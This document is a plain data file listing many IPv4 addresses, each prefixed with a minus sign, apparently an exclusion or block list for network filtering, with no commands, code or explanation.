-52.5.155.249 -101.124.5.140 -123.57.157.165 -54.163.185.133 -119.28.47.161 -145.239.195.90 -192.169.192.46 -45.77.34.99 -106.14.34.75 -27.151.28.75 -186.4.176.187 -114.215.190.123 -172.104.182.118 -94.237.35.62 -139.224.239.233 -23.224.245.35 -192.99.182.210 -122.49.225.84 -192.169.237.214 -45.76.221.134 -69.164.214.14 -61.141.124.126 -52.197.157.195 -192.169.219.14 -177.125.218.211 -45.63.25.229 -78.72.22.147 -5.199.172.65 -87.229.120.81 -80.209.224.132 -157.7.207.227 -23.224.115.60 -125.212.228.75 -45.56.107.126 -185.39.193.8 -23.224.245.49 -183.15.14.244 -123.56.26.44 -45.32.111.20 -185.174.29.176 -142.4.107.229 -207.127.8.240 -80.82.32.21 -103.100.157.232 -103.100.157.203 -153.126.215.28 -67.222.158.71 -149.202.96.147 -185.124.84.164 -116.58.39.29 -103.100.157.184 -45.79.133.148 -27.156.125.225 -103.22.181.31 -222.73.136.65 -176.31.16.36 -216.189.154.157 -122.114.22.139 -162.247.235.67 -120.24.57.225 -46.29.18.168 -82.146.44.65 -39.77.157.47 -120.24.157.224 -99.192.222.70 -204.93.176.74 -139.224.195.25 -23.239.17.93 -185.175.208.104 -101.37.20.218 -43.230.203.160 -185.24.201.180 -69.197.177.226 -177.101.147.190 -217.146.74.37 -160.16.58.38 -210.14.78.211 -122.214.243.73 -37.187.195.40 -123.207.245.102 -45.76.154.110 -192.80.147.91 -82.135.148.64 -192.99.78.28 -45.251.88.36 -58.246.65.10 -90.5.124.134 -50.97.227.201 -5.160.247.233 -104.203.82.149 -208.87.37.246 -192.80.147.121 -114.55.8.20 -116.236.231.207 -61.67.218.210 -83.136.236.90 -101.201.80.215 -1.32.96.132 -1.119.137.90 -43.242.143.27 -70.38.67.116 -104.238.146.41 -223.223.188.217 -200.194.207.236 -101.200.185.189 -196.168.170.108 -216.117.137.43 -31.184.233.54 -101.132.159.8 -178.33.45.93 -14.29.84.89 -172.247.51.214 -1.222.212.6 -54.207.103.252 -103.200.5.251 -59.13.59.134 -94.23.47.90 -221.229.173.86 -89.46.128.51 -199.87.234.115 -119.81.46.98 -45.32.121.205 -124.204.45.42 -43.230.200.62 -212.118.226.211 -142.44.176.37 -221.2.41.13 -54.36.88.239 -123.150.244.33 -60.12.106.243 -139.162.54.242 -69.65.10.241 -52.172.40.156 -220.165.236.193 -184.107.210.110 -120.25.96.99 -45.32.108.227 -91.227.16.124 -209.95.44.226 -59.56.104.24 -114.55.149.17 -173.249.19.162 -118.89.143.252 -47.95.254.94 -183.111.138.168 -123.57.17.159 -202.43.162.58 -211.140.151.56 -185.58.205.140 -195.88.72.30 -149.56.87.200 -39.108.188.105 -66.228.39.95 -203.156.235.179 -112.78.10.90 -46.235.81.29 -65.49.228.239 -144.217.6.250 -202.29.215.171 -185.29.122.98 -218.25.233.226 -121.42.55.116 -115.29.104.189 -219.139.82.52 -60.190.171.227 -115.29.225.236 -162.144.74.96 -123.56.13.43 -37.58.110.210 -89.163.247.162 -82.102.14.4 -92.43.113.71 -166.63.21.107 -94.23.144.231 -24.222.225.58 -178.57.222.9 -93.95.98.92 -120.92.214.28 -172.80.123.74 -173.248.174.225 -199.168.189.11 -103.68.82.95 -112.124.47.13 -45.114.94.247 -23.224.243.60 -120.77.73.60 -82.202.236.222 -195.206.253.8 -217.182.236.212 -194.28.172.171 -116.62.56.158 -120.26.212.36 -181.48.95.74 -106.120.214.38 -123.57.76.159 -220.249.119.156 -121.201.34.88 -120.25.61.222 -109.235.66.105 -43.254.218.69 -139.199.72.94 -45.61.114.9 -45.114.94.140 -114.55.179.169 -66.254.190.206 -117.79.92.77 -58.250.192.159 -64.118.90.237 -202.91.8.24 -185.107.66.27 -118.89.192.233 -121.40.143.220 -45.33.106.140 -87.204.75.176 -188.132.135.59 -78.110.246.84 -45.33.95.185 -103.27.60.7 -116.62.13.94 -216.83.136.42 -119.10.28.52 -198.50.209.27 -114.55.58.6 -54.179.147.195 -112.109.94.247 -142.4.119.78 -173.212.228.104 -93.95.60.52 -188.132.147.176 -69.61.64.174 -45.32.117.174 -120.25.247.72 -118.102.25.149 -66.228.45.169 -134.119.219.188 -94.250.252.57 -94.250.252.57 -185.20.227.169 -59.38.240.234 -203.150.20.125 -178.33.110.16 -190.187.107.69 -198.7.56.75 -92.53.72.179 -47.93.8.198 -174.142.54.10 -104.238.181.19 -66.154.119.208 -118.126.142.186 -206.223.156.202 -122.255.14.100 -106.14.121.8 -120.76.99.74 -222.249.232.178 -69.175.18.45 -108.160.144.212 -43.241.48.34 -220.231.207.163 -41.76.170.154 -117.21.173.47 -198.50.194.83 -45.32.204.50 -103.100.157.113 -198.96.210.243 -101.200.86.25 -142.4.103.84 -121.14.199.229 -65.18.120.16 -178.211.56.170 -113.66.158.6 -198.143.189.202 -45.56.101.161 -182.254.150.190 -120.25.65.153 -144.217.14.128 -139.159.212.230 -203.91.114.101 -185.38.45.100 -23.224.243.43 -173.239.65.92 -198.154.233.104 -23.225.89.142 -173.212.239.36 -114.215.149.117 -142.4.103.110 -59.60.156.18 -45.114.94.248 -72.1.245.34 -185.143.173.250 -201.220.66.252 -34.198.173.136 -104.165.44.101 -161.202.7.155 -23.224.242.7 -159.253.46.3 -121.40.97.20 -112.74.181.78 -217.23.11.235 -52.198.211.111 -106.15.0.195 -123.206.86.150 -52.33.100.102 -178.32.66.245 -149.202.121.254 -203.195.180.106 -114.215.178.199 -42.123.84.42 -45.114.117.117 -115.28.76.1 -88.99.12.181 -188.132.147.7 -45.61.112.8 -120.76.233.240 -119.23.72.39 -95.213.224.61 -176.126.165.40 -69.28.224.130 -115.28.200.2 -121.196.244.69 -94.156.77.90 -45.61.115.54 -121.40.114.54 -49.212.204.197 -123.57.0.154 -116.236.231.217 -153.120.128.89 -206.217.216.76 -185.203.240.53 -23.225.113.148 -213.74.95.142 -106.15.37.190 -89.107.129.114 -108.163.177.28 -203.194.131.156 -52.198.112.188 -5.196.72.63 -82.135.151.21 -149.255.152.92 -172.93.102.146 -66.85.186.61 -118.123.173.99 -64.120.123.152 -212.232.62.100 -123.57.9.212 -23.224.243.41 -203.153.105.242 -34.194.140.26 -87.98.148.210 -23.224.245.11 -92.222.239.252 -123.207.214.132 -139.196.10.158 -66.37.12.84 -192.30.161.80 -195.62.52.176 -120.55.163.145 -164.52.150.227 -45.252.250.202 -112.126.87.12 -45.61.115.43 -54.237.250.162 -162.144.206.215 -223.4.144.194 -202.146.241.54 -185.51.66.126 -117.28.158.235 -52.4.127.20 -166.63.21.26 -37.187.142.165 -35.176.193.58 -114.215.176.107 -13.230.197.127 -119.27.191.184 -184.154.216.44 -120.24.186.213 -106.14.68.173 -211.171.115.134 -185.161.175.71 -142.91.95.208 -40.114.217.106 -121.78.236.30 -64.118.90.216 -23.225.113.4 -45.63.15.15 -14.205.4.211 -182.253.71.156 -43.242.214.177 -198.200.41.104 -123.207.231.232 -109.73.95.207 -115.68.89.41 -66.63.173.54 -192.165.40.211 -142.4.107.233 -173.236.111.163 -217.23.11.174 -54.223.252.11 -223.223.178.9 -185.187.161.150 -149.56.127.104 -172.247.51.171 -194.28.175.88 -121.41.74.137 -31.41.219.168 -52.53.209.252 -104.128.239.82 -195.155.130.72 -67.203.22.66 -164.132.161.203 -89.163.221.192 -153.122.145.106 -66.228.134.199 -117.48.193.2 -121.32.121.39 -104.239.135.251 -107.6.146.99 -192.99.249.72 -120.132.49.203 -89.163.150.251 -123.66.115.5 -80.241.211.187 -13.112.206.25 -82.135.151.239 -66.175.208.228 -108.61.183.239 -185.106.23.7 -45.32.250.66 -202.28.24.70 -59.125.156.207 -45.76.163.240 -120.26.213.117 -119.29.78.83 -104.203.82.217 -172.247.51.180 -23.225.89.139 -188.121.51.103 -92.222.117.50 -119.81.219.200 -183.2.242.86 -198.56.238.31 -82.135.151.162 -94.228.215.83 -208.65.110.19 -118.190.142.104 -202.158.52.86 -190.128.171.14 -23.224.243.62 -23.225.239.45 -116.62.100.113 -106.3.227.135 -123.206.197.200 -91.121.143.183 -23.88.82.167 -176.31.106.53 -207.210.68.44 -107.191.60.242 -139.196.228.29 -23.224.115.249 -121.52.214.192 -123.56.154.218 -84.243.213.179 -125.253.127.131 -123.30.139.45 -125.253.127.142 -192.95.37.80 -182.16.124.14 -77.75.124.185 -120.77.202.136 -187.160.252.58 -210.209.116.43 -59.63.166.111 -220.164.125.248 -219.141.230.147 -58.218.204.5 -104.203.82.99 -52.53.234.113 -169.57.78.98 -62.12.114.176 -45.76.188.91 -52.91.115.45 -220.227.107.74 -118.193.211.44 -88.208.26.21 -115.28.88.30 -47.52.24.175 -112.74.12.101 -114.251.235.120 -188.42.60.12 -104.207.44.122 -54.36.184.173 -14.142.244.172 -172.246.101.242 -173.212.199.191 -80.249.164.190 -34.239.245.212 -185.65.245.226 -95.183.48.201 -174.142.16.12 -47.94.42.253 -178.22.71.234 -180.168.60.148 -123.206.79.177 -198.251.67.25 -121.199.28.25 -74.86.147.250 -64.237.53.75 -51.254.5.203 -206.214.216.251 -72.1.245.30 -203.195.129.233 -77.46.149.197 -59.120.48.9 -66.209.89.229 -211.100.72.214 -188.132.135.63 -50.63.162.86 -23.224.115.169 -114.226.124.112 -60.205.202.182 -151.248.126.134 -120.25.107.148 -23.225.113.69 -111.205.210.43 -82.135.151.238 -78.40.228.237 -115.186.147.89 -35.165.204.138 -209.205.219.99 -104.203.82.194 -120.26.206.200 -37.187.54.112 -101.53.137.94 -139.162.59.172 -122.195.200.49 -115.28.66.24 -103.68.82.99 -144.217.0.120 -194.58.102.26 -66.70.214.250 -46.249.48.14 -125.46.23.163 -82.135.148.120 -93.170.129.111 -23.95.90.193 -54.187.249.122 -39.104.59.43 -173.236.111.165 -45.77.118.227 -120.79.198.128 -185.99.36.226 -115.68.27.66 -148.251.122.174 -117.78.52.63 -185.38.45.110 -103.24.3.145 -124.207.43.71 -23.225.239.52 -23.225.113.210 -42.228.143.49 -188.93.231.201 -62.210.167.218 -222.185.243.101 -192.163.193.138 -23.225.113.55 -64.78.165.93 -23.225.239.150 -132.148.84.65 -210.14.69.68 -47.94.134.157 -177.38.34.163 -36.7.87.75 -120.76.30.41 -121.28.9.27 -120.27.96.176 -217.115.137.195 -188.93.232.27 -91.212.205.237 -69.169.88.85 -208.109.55.70 -122.114.94.161 -52.11.86.41 -209.236.119.88 -61.191.24.174 -119.15.159.30 -142.91.95.86 -216.117.148.71 -185.12.5.190 -46.105.38.78 -104.130.207.239 -124.160.238.202 -115.238.244.84 -54.223.162.63 -188.132.135.27 -139.129.232.134 -118.123.249.161 -139.196.202.248 -23.224.244.12 -169.54.217.82 -41.206.201.9 -103.253.113.117 -144.168.71.139 -23.225.113.243 -60.12.111.123 -104.239.175.144 -106.187.36.132 -185.174.30.145 -173.237.190.248 -122.224.143.68 -45.33.13.225 -122.115.63.84 -31.173.88.114 -162.250.76.11 -137.74.90.157 -104.203.82.47 -58.58.185.107 -91.224.135.121 -123.231.255.130 -183.95.84.82 -104.168.134.236 -164.52.150.245 -153.121.48.120 -23.225.239.155 -46.105.221.66 -122.15.82.8 -172.247.51.71 -185.94.236.28 -123.57.175.145 -158.69.120.42 -125.253.127.182 -52.196.16.142 -91.121.36.200 -104.224.205.102 -103.193.241.196 -188.116.7.144 -112.74.53.166 -192.99.78.11 -115.159.146.18 -180.169.101.10 -163.172.197.196 -172.246.101.218 -192.80.147.252 -45.76.151.240 -203.81.28.139 -115.248.10.134 -14.18.205.225 -208.77.216.132 -104.223.124.140 -54.223.145.37 -93.187.201.134 -103.91.126.36 -101.200.162.63 -149.202.127.25 -108.161.139.237 -122.14.198.78 -120.25.201.142 -149.56.36.190 -116.255.211.206 -188.116.39.78 -94.136.38.191 -133.242.150.172 -142.4.107.111 -121.46.0.90 -94.45.59.94 -54.157.18.94 -72.1.245.93 -113.98.59.45 -145.239.235.224 -116.231.90.72 -47.89.38.108 -205.186.136.38 -52.56.110.216 -125.253.127.200 -101.201.55.233 -123.56.207.39 -5.39.41.200 -199.83.63.150 -178.32.28.173 -107.180.84.39 -190.12.101.94 -119.252.89.22 -142.91.95.159 -39.106.72.155 -67.228.175.236 -111.230.144.77 -133.130.68.182 -54.214.207.238 -104.203.82.235 -47.88.84.190 -120.79.65.37 -119.27.26.11 -47.52.248.147 -120.26.216.211 -120.25.159.19 -54.175.142.9 -185.83.147.149 -221.211.161.73 -131.108.125.59 -139.196.105.120 -185.174.29.216 -18.197.27.114 -142.44.201.197 -133.242.6.175 -167.114.51.85 -120.55.115.222 -65.60.28.172 -67.23.241.18 -123.58.33.150 -182.254.221.109 -199.167.40.52 -45.56.96.225 -173.214.250.10 -176.31.234.109 -82.135.151.58 -119.29.160.205 -119.81.18.50 -50.62.58.20 -37.72.172.182 -114.215.135.91 -65.60.59.114 -178.32.116.232 -5.2.147.5 -185.65.245.40 -120.55.89.230 -139.196.140.83 -43.243.93.121 -196.30.251.185 -139.199.153.87 -59.153.61.178 -67.222.133.242 -144.217.167.151 -45.61.115.22 -220.227.247.36 -47.96.179.36 -121.41.22.72 -45.114.94.214 -208.78.98.72 -115.29.184.23 -23.92.30.74 -45.61.115.40 -222.186.21.138 -23.224.245.24 -120.25.76.253 -195.158.2.222 -114.215.134.72 -164.52.150.239 -123.207.235.65 -116.236.231.173 -149.56.6.29 -118.31.17.226 -37.187.158.61 -112.124.121.119 -162.209.125.67 -120.26.118.222 -160.16.110.253 -112.78.1.224 -103.24.0.108 -23.224.115.119 -192.163.204.111 -101.37.37.74 -103.81.168.205 -39.108.55.232 -192.187.110.11 -91.229.44.5 -119.2.84.32 -219.150.222.102 -64.120.123.249 -123.57.206.226 -31.171.251.51 -49.0.0.98 -183.15.122.47 -210.56.55.133 -49.212.173.177 -121.40.58.53 -120.26.134.241 -23.225.113.66 -202.5.20.39 -62.12.115.110 -13.126.234.31 -207.45.183.24 -198.200.41.119 -54.223.187.7 -196.168.170.107 -5.189.156.80 -188.132.215.229 -23.224.242.13 -91.227.16.126 -195.29.95.4 -139.196.149.159 -45.76.178.211 -192.80.147.127 -74.207.243.75 -121.127.217.99 -124.192.148.3 -202.47.95.211 -5.254.88.187 -23.224.115.159 -121.40.131.110 -119.29.118.111 -91.121.36.26 -167.88.113.22 -185.98.63.129 -103.100.157.200 -58.241.18.117 -185.106.21.10 -184.107.57.108 -112.78.1.205 -47.92.100.244 -64.120.123.178 -185.37.228.130 -139.162.62.170 -114.215.145.120 -59.110.41.196 -142.91.95.198 -119.28.6.150 -23.88.82.112 -172.246.101.125 -120.76.98.244 -45.32.53.78 -83.151.26.18 -142.91.95.82 -89.35.7.160 -39.108.112.81 -114.215.68.16 -178.32.66.242 -81.200.48.97 -118.145.2.193 -196.1.60.19 -198.200.41.59 -185.70.96.11 -192.99.139.192 -103.100.157.193 -31.210.159.180 -164.132.83.2 -120.26.48.149 -113.110.228.188 -62.90.102.60 -116.62.68.172 -47.93.12.18 -218.16.211.197 -123.206.83.70 -50.31.0.234 -37.143.12.147 -101.37.255.106 -65.60.22.23 -104.207.44.101 -185.38.151.52 -23.224.115.192 -77.233.5.121 -115.159.225.144 -77.92.152.71 -198.200.41.116 -185.18.148.196 -24.39.1.136 -103.210.239.72 -120.24.55.144 -61.135.198.228 -172.247.51.102 -133.242.121.214 -58.60.152.124 -91.194.90.110 -162.13.185.240 -66.70.189.108 -107.180.78.47 -47.88.148.83 -199.102.44.28 -173.249.3.80 -199.168.189.8 -198.13.57.106 -85.117.33.5 -59.110.161.173 -175.103.43.110 -39.108.87.104 -209.95.52.115 -103.100.157.104 -112.74.73.14 -23.224.244.38 -66.155.105.244 -125.253.116.39 -45.77.44.169 -202.47.112.30 -185.38.45.118 -75.126.0.165 -172.247.51.140 -186.208.81.66 -149.56.47.196 -185.174.30.215 -45.32.116.65 -59.50.95.201 -114.215.157.26 -166.63.21.100 -104.194.238.84 -23.224.115.69 -188.132.147.24 -198.20.106.102 -23.225.113.127 -104.207.44.111 -139.196.92.138 -158.69.81.189 -23.224.115.101 -111.67.194.121 -218.4.188.123 -23.224.242.52 -43.255.106.142 -23.224.115.29 -52.8.50.186 -120.26.229.138 -185.145.131.154 -23.225.113.224 -192.80.147.71 -78.28.127.202 -114.55.175.118 -114.242.207.253 -153.125.234.24 -83.175.158.245 -115.159.71.254 -115.28.229.125 -49.212.164.166 -180.179.212.111 -200.75.8.69 -46.166.181.13 -46.164.138.133 -115.29.237.25 -106.14.156.29 -209.126.105.162 -172.246.101.3 -54.173.174.0 -54.199.170.175 -114.55.41.55 -94.23.90.71 -209.51.207.228 -120.27.32.206 -178.18.198.37 -188.132.147.157 -103.100.157.42 -194.24.241.236 -121.239.83.11 -58.61.144.253 -192.80.147.248 -23.224.245.20 -121.199.37.4 -120.24.54.67 -97.74.237.120 -103.100.157.27 -219.75.124.214 -120.55.182.3 -212.71.232.229 -133.242.230.167 -192.80.147.241 -72.1.245.32 -112.78.10.72 -93.90.183.171 -45.76.1.242 -151.80.81.38 -173.203.69.123 -216.119.150.46 -206.51.142.36 -103.7.57.27 -173.236.115.76 -182.146.203.166 -194.58.100.84 -69.36.172.238 -104.165.47.175 -212.166.67.209 -103.45.59.6 -183.134.6.42 -87.98.142.231 -61.153.60.134 -120.77.178.63 -123.97.33.221 -149.56.151.149 -216.155.129.14 -91.109.247.113 -218.244.142.254 -109.237.217.62 -112.78.10.99 -114.55.85.186 -37.75.10.18 -158.85.93.86 -164.132.110.83 -172.247.51.204 -185.182.91.21 -178.33.227.56 -54.223.23.249 -217.160.224.194 -199.119.140.51 -149.71.97.10 -23.224.243.44 -119.23.110.155 -177.13.8.252 -45.79.109.86 -60.205.218.123 -120.24.0.212 -80.84.113.118 -121.42.226.216 -104.207.52.83 -5.135.224.59 -115.159.40.168 -172.246.101.178 -192.80.147.165 -43.243.222.127 -200.195.180.11 -192.155.86.88 -66.212.31.66 -37.107.97.166 -103.213.251.92 -172.247.51.32 -36.110.175.18 -109.169.86.242 -107.155.101.66 -106.14.14.230 -166.63.21.21 -64.64.8.59 -112.74.163.145 -103.200.23.241 -104.165.60.75 -120.77.47.149 -65.254.44.178 -50.63.175.146 -173.203.98.244 -158.69.187.250 -118.31.229.99 -60.2.177.94 -104.168.147.41 -66.154.119.223 -198.50.176.73 -115.28.48.207 -37.59.146.66 -149.56.127.63 -158.69.71.197 -45.56.100.129 -139.199.202.176 -85.234.159.106 -81.28.98.89 -107.180.68.247 -23.225.89.75 -101.200.189.32 -123.207.143.251 -46.163.118.228 -125.253.127.186 -115.238.158.198 -115.28.185.62 -37.220.0.101 -101.201.141.252 -64.237.40.67 -47.52.131.154 -122.2.133.119 -198.27.115.58 -121.43.184.189 -66.175.216.10 -104.148.75.199 -125.92.250.113 -50.28.19.233 -184.154.202.147 -184.72.228.179 -172.247.250.228 -66.70.223.68 -178.33.15.75 -203.195.155.119 -41.138.69.18 -157.52.240.67 -182.48.115.232 -50.63.52.129 -203.113.174.176 -119.29.189.243 -120.27.35.19 -77.95.178.76 -104.207.52.73 -184.107.164.131 -51.254.242.210 -121.196.194.208 -173.236.115.246 -74.208.68.249 -112.74.23.146 -195.159.185.165 -220.226.210.91 -54.172.43.224 -91.210.191.89 -69.36.242.141 -82.144.222.112 -185.29.122.213 -23.88.82.34 -209.239.115.167 -112.66.74.150 -121.43.63.197 -23.225.239.20 -5.205.153.108 -144.168.73.135 -74.207.233.63 -190.153.181.43 -199.188.111.133 -79.98.30.152 -65.60.5.117 -47.93.191.121 -111.231.139.45 -113.6.234.16 -181.174.189.253 -62.216.33.136 -58.56.9.110 -213.136.82.6 -188.132.147.148 -101.200.73.215 -103.15.51.184 -88.86.126.237 -123.124.50.213 -107.181.251.134 -49.128.81.17 -176.10.114.69 -218.246.35.74 -107.179.93.53 -66.171.251.146 -121.42.166.150 -103.42.15.246 -52.191.132.179 -213.189.61.143 -157.7.248.73 -82.144.222.31 -222.186.3.37 -87.98.250.156 -54.241.9.66 -107.150.57.29 -172.105.232.127 -104.165.47.164 -45.61.113.16 -201.90.89.232 -82.135.151.56 -95.213.159.133 -166.62.57.135 -23.224.115.49 -106.75.148.192 -123.56.89.226 -151.80.169.151 -110.88.128.141 -120.26.2.197 -46.254.18.249 -164.132.130.177 -23.244.241.213 -78.46.114.23 -209.141.54.193 -122.80.21.70 -173.193.125.117 -172.246.101.75 -104.207.44.123 -192.157.201.110 -5.189.186.181 -120.78.89.86 -64.15.149.92 -58.100.228.14 -103.236.163.62 -202.153.178.204 -161.202.10.159 -103.80.27.172 -78.47.115.47 -23.225.113.239 -37.187.212.137 -172.247.51.212 -185.174.31.224 -89.108.93.76 -217.182.220.7 -75.126.131.124 -101.0.68.122 -222.73.42.197 -119.29.229.65 -199.102.44.42 -121.42.144.194 -118.190.19.142 -222.241.79.29 -39.108.173.253 -107.190.232.72 -60.216.47.126 -107.6.168.132 -192.80.147.124 -45.77.38.45 -219.141.209.50 -194.160.3.45 -118.89.46.201 -43.240.244.106 -112.74.170.33 -209.236.68.76 -192.80.147.35 -216.131.67.202 -101.81.98.91 -94.23.112.199 -216.131.64.173 -120.76.217.142 -103.28.37.205 -175.6.7.106 -222.255.29.30 -99.192.250.33 -184.154.164.229 -202.90.199.122 -173.255.229.221 -39.108.168.69 -59.153.61.175 -101.251.254.42 -93.174.163.193 -86.104.177.56 -144.208.69.166 -114.55.112.76 -192.95.53.102 -189.206.18.181 -95.177.131.212 -38.95.1.12 -216.131.68.114 -119.28.15.87 -45.114.94.172 -119.23.9.80 -172.247.51.74 -125.253.127.198 -199.182.224.11 -84.200.62.56 -65.60.43.163 -93.17.133.165 -89.188.121.124 -176.221.75.147 -120.114.150.115 -54.65.199.234 -120.25.255.158 -120.25.152.110 -202.86.222.194 -125.253.127.152 -103.254.126.148 -72.1.245.110 -107.179.102.214 -188.68.51.243 -177.101.147.239 -192.80.147.192 -47.94.38.129 -23.225.89.21 -151.80.59.128 -120.199.126.188 -185.107.66.28 -133.242.185.83 -178.63.17.148 -222.79.40.154 -91.241.67.251 -212.68.42.181 -198.49.67.214 -218.2.51.234 -45.77.28.8 -176.28.54.252 -23.225.239.121 -188.165.57.126 -82.146.56.127 -34.244.175.33 -172.246.101.132 -54.37.242.203 -54.175.131.31 -125.253.127.172 -204.14.31.155 -65.99.225.122 -198.61.209.21 -45.76.152.189 -216.131.119.108 -178.32.44.234 -203.142.83.123 -94.23.45.119 -177.185.142.55 -210.51.1.24 -103.71.48.91 -23.225.113.128 -193.136.42.140 -60.186.192.4 -174.142.68.39 -192.169.227.75 -218.29.184.91 -94.73.154.108 -125.253.127.171 -128.1.182.103 -138.201.203.166 -46.41.150.17 -82.135.148.226 -23.244.241.187 -176.119.57.222 -45.33.85.158 -207.254.50.116 -108.166.21.18 -114.55.32.94 -121.43.196.93 -144.217.239.229 -120.27.155.6 -23.244.241.100 -172.246.101.141 -51.255.113.102 -104.207.129.92 -190.214.26.114 -216.131.64.169 -121.14.127.126 -72.1.245.88 -191.96.231.253 -43.226.39.94 -45.125.48.57 -125.253.127.177 -36.7.136.97 -66.39.65.54 -23.224.242.33 -125.253.127.127 -23.225.89.47 -60.31.215.178 -54.86.26.81 -120.26.63.239 -128.119.247.140 -163.44.192.30 -146.71.97.58 -78.129.145.180 -125.253.127.165 -31.210.52.184 -192.40.4.176 -58.222.1.18 -59.86.160.91 -59.110.136.23 -112.3.18.4 -142.4.103.79 -43.255.39.21 -111.75.163.49 -193.136.103.144 -216.131.67.204 -184.154.142.21 -54.238.54.49 -198.50.209.26 -37.59.146.73 -216.131.117.9 -47.94.0.182 -123.127.34.228 -210.13.89.167 -198.61.209.29 -120.24.168.218 -23.224.115.199 -101.201.73.231 -103.28.38.128 -23.234.27.113 -58.82.132.195 -201.73.144.149 -104.165.44.104 -199.203.139.175 -216.131.64.174 -24.199.46.58 -78.194.94.84 -106.75.109.208 -123.56.248.41 -103.206.20.13 -188.219.128.138 -216.45.52.119 -216.131.116.77 -212.68.42.15 -47.97.163.153 -211.159.174.138 -132.148.146.206 -91.90.253.10 -50.57.58.24 -111.231.87.47 -115.231.60.75 -192.80.147.175 -118.184.0.96 -45.76.14.118 -89.33.247.22 -89.218.26.109 -121.43.180.35 -67.207.134.103 -139.199.14.236 -103.15.67.83 -114.55.89.108 -125.253.127.102 -60.32.204.194 -43.245.187.28 -192.30.249.71 -101.200.90.229 -59.188.9.35 -125.253.127.168 -120.26.169.232 -154.18.65.35 -182.92.238.216 -205.185.112.59 -45.124.85.169 -107.155.95.19 -218.244.148.164 -120.26.101.123 -111.231.62.131 -103.48.83.17 -202.105.182.156 -123.207.54.169 -50.22.56.30 -91.197.147.140 -103.54.250.195 -104.224.202.170 -198.27.126.35 -52.2.115.120 -94.102.7.214 -125.253.127.137 -103.90.228.164 -142.4.119.69 -54.92.93.224 -67.227.234.216 -91.198.44.108 -216.131.119.106 -173.193.186.234 -220.167.101.60 -106.15.92.221 -222.255.122.162 -199.245.54.204 -54.162.168.139 -92.62.129.19 -51.211.183.123 -133.242.155.135 -83.222.218.9 -118.238.21.16 -193.91.67.244 -152.1.2.176 -222.255.167.89 -125.253.127.101 -125.253.127.163 -125.253.127.113 -216.45.58.198 -65.111.164.71 -52.91.34.67 -13.124.50.60 -104.128.238.137 -216.131.81.126 -104.207.44.76 -91.102.162.79 -72.1.245.12 -216.131.114.186 -23.104.135.7 -111.231.18.66 -216.131.114.187 -123.31.41.44 -103.48.83.141 -216.52.187.218 -52.198.172.121 -54.157.14.84 -112.124.8.93 -45.77.41.97 -147.135.178.113 -123.31.20.102 -174.129.24.222 -50.19.178.162 -125.253.127.135 -50.28.58.73 -82.221.139.42 -125.253.127.195 -183.133.76.107 -104.207.44.72 -125.253.127.111 -91.230.61.29 -103.196.195.252 -183.81.160.228 -125.253.126.204 -125.253.127.144 -125.253.127.141 -125.253.127.128 -185.174.29.217 -69.175.18.34 -217.147.91.147 -207.246.85.60 -45.114.94.83 -104.207.44.98 -218.61.71.251 -162.251.94.160 -162.144.44.19 -103.253.112.41 -78.129.241.81 -54.74.28.20 -86.106.137.226 -142.44.226.196 -23.225.239.48 -172.99.114.39 -200.94.131.228 -160.153.36.195 -182.92.98.199 -106.75.21.127 -23.225.89.226 -202.51.56.61 -52.91.101.48 -111.231.195.197 -96.44.169.222 -91.221.99.152 -113.240.243.140 -108.61.150.186 -176.107.130.111 -103.100.157.217 -111.93.130.58 -123.30.144.31 -123.30.109.6 -123.30.169.181 -123.30.128.190 -122.252.236.126 -118.98.234.64 -45.252.250.238 -67.23.241.19 -193.151.89.47 -60.190.91.26 -62.4.29.135 -64.118.95.117 -139.162.117.179 -218.89.149.160 -116.236.231.188 -111.231.16.127 -185.117.155.215 -72.52.93.208 -60.169.216.147 -121.42.196.122 -69.13.210.185 -87.98.188.181 -172.247.51.11 -54.149.98.134 -54.152.118.189 -89.19.22.218 -218.25.148.30 -125.253.127.196 -54.196.218.55 -54.225.239.73 -1.56.10.238 -220.191.209.180 -37.188.100.153 -23.225.239.163 -185.174.30.191 -188.116.39.117 -94.75.71.217 -129.194.185.95 -104.207.44.84 -103.48.83.18 -161.202.191.131 -109.104.125.164 -142.4.107.81 -185.53.170.43 -54.189.152.153 -96.126.114.152 -82.135.148.139 -85.143.212.76 -139.129.221.57 -139.99.5.10 -185.101.93.64 -218.153.66.74 -188.132.147.173 -142.4.119.110 -51.254.44.99 -188.120.224.227 -95.226.178.133 -104.207.52.87 -104.207.44.115 -82.135.151.155 -178.216.202.80 -67.222.158.69 -94.133.77.75 -172.104.168.51 -69.65.56.176 -172.246.101.67 -91.230.194.94 -45.79.160.184 -103.37.235.230 -91.109.3.67 -112.124.39.135 -120.27.154.124 -37.247.99.23 -199.167.41.24 -66.128.53.185 -187.95.62.58 -195.20.15.193 -149.56.146.113 -120.25.210.212 -198.200.41.101 -31.179.223.53 -114.55.33.44 -104.207.40.187 -23.104.135.86 -176.31.152.28 -218.31.147.230 -82.221.132.67 -58.117.135.249 -104.238.93.197 -157.52.130.135 -69.64.48.79 -89.252.188.168 -185.174.28.151 -222.122.226.145 -187.108.192.157 -216.158.235.4 -84.54.236.52 -67.227.191.14 -23.253.125.147 -119.23.161.184 -188.231.193.211 -120.26.164.146 -166.62.36.163 -162.209.213.123 -78.137.160.28 -86.104.177.5 -134.119.248.38 -145.239.30.55 -207.178.46.14 -42.112.38.178 -217.149.108.12 -106.15.60.64 -178.79.165.77 -118.89.105.228 -117.120.3.105 -202.153.179.201 -190.92.45.205 -185.174.29.179 -23.224.115.218 -144.168.124.12 -120.27.48.133 -43.243.74.13 -69.164.206.133 -139.224.70.100 -109.235.252.147 -173.212.214.138 -54.37.0.129 -185.183.97.208 -202.46.29.215 -182.18.174.232 -61.155.216.13 -101.231.74.130 -46.105.87.132 -103.240.16.239 -122.155.162.58 -182.92.99.37 -45.76.105.172 -114.215.210.21 -51.255.192.108 -185.174.31.228 -212.68.42.235 -23.224.243.39 -121.41.105.238 -104.148.100.120 -89.33.247.3 -23.224.243.15 -23.244.241.161 -82.223.35.188 -109.239.49.66 -72.1.245.114 -121.28.14.226 -65.60.46.158 -124.160.151.144 -91.218.229.224 -61.155.238.11 -184.107.230.76 -123.13.200.51 -194.58.98.112 -119.81.70.150 -176.31.232.156 -216.245.203.235 -94.130.28.43 -46.21.202.160 -80.237.218.70 -23.244.241.215 -196.1.59.111 -167.114.54.80 -172.247.51.106 -106.75.165.51 -45.77.97.50 -172.246.101.214 -103.100.157.142 -187.95.189.244 -202.162.221.174 -122.114.205.157 -54.174.16.119 -103.96.140.14 -185.98.63.127 -120.76.122.157 -39.106.127.226 -201.203.181.140 -5.178.80.229 -120.78.158.32 -183.129.197.206 -116.62.65.235 -108.170.31.222 